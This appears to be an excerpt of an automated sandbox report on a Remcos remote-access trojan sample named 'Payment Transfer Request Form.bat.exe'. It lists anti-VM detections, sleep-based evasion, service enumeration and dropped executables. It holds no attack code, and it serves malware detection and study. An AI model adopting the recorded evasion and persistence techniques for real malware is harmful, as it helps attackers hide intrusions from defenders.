              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: iKgKaogJ.exe PID: 7508, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 7704, type: MEMORYSTR
              Delayed program exit found
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040E18D Sleep,ExitProcess,9_2_0040E18D
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeMemory allocated: 7720000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeMemory allocated: 8720000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeMemory allocated: 88D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeMemory allocated: 98D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeMemory allocated: 7A80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeMemory allocated: 8A80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeMemory allocated: 8C20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeMemory allocated: 9C20000 memory reserve | memory write watchJump to behavior
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 1060000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 2DA0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 4DA0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 78B0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 88B0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 8A50000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 9A50000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 15A0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 3140000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 2F60000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 7B10000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 8B10000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 8CB0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 9CB0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 2D30000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 2EC0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 4EC0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 7960000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 8960000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 8B00000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 9B00000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 1210000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 3080000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 1240000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 7930000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 8930000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 8AC0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory allocated: 9AC0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_004186FE
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\ProgramData\AppUpdate\remcos.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\AppUpdate\remcos.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\AppUpdate\remcos.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\AppUpdate\remcos.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5777Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7007Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 355Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5690
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6346
              Source: C:\ProgramData\AppUpdate\remcos.exeWindow / User API: threadDelayed 9765
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeEvaded block: after key decisiongraph_9-46338
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeEvaded block: after key decisiongraph_9-46434
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeAPI coverage: 5.2 %
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe TID: 5236Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 5777 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep count: 132 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe TID: 7544Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 7720Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep count: 5690 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3112Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep count: 180 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep time: -922337203685477s >= -30000s
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 8184Thread sleep count: 229 > 30
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 8184Thread sleep time: -687000s >= -30000s
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 8184Thread sleep count: 9765 > 30
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 8184Thread sleep time: -29295000s >= -30000s
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 1072Thread sleep time: -922337203685477s >= -30000s
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 7368Thread sleep time: -922337203685477s >= -30000s
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 5336Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
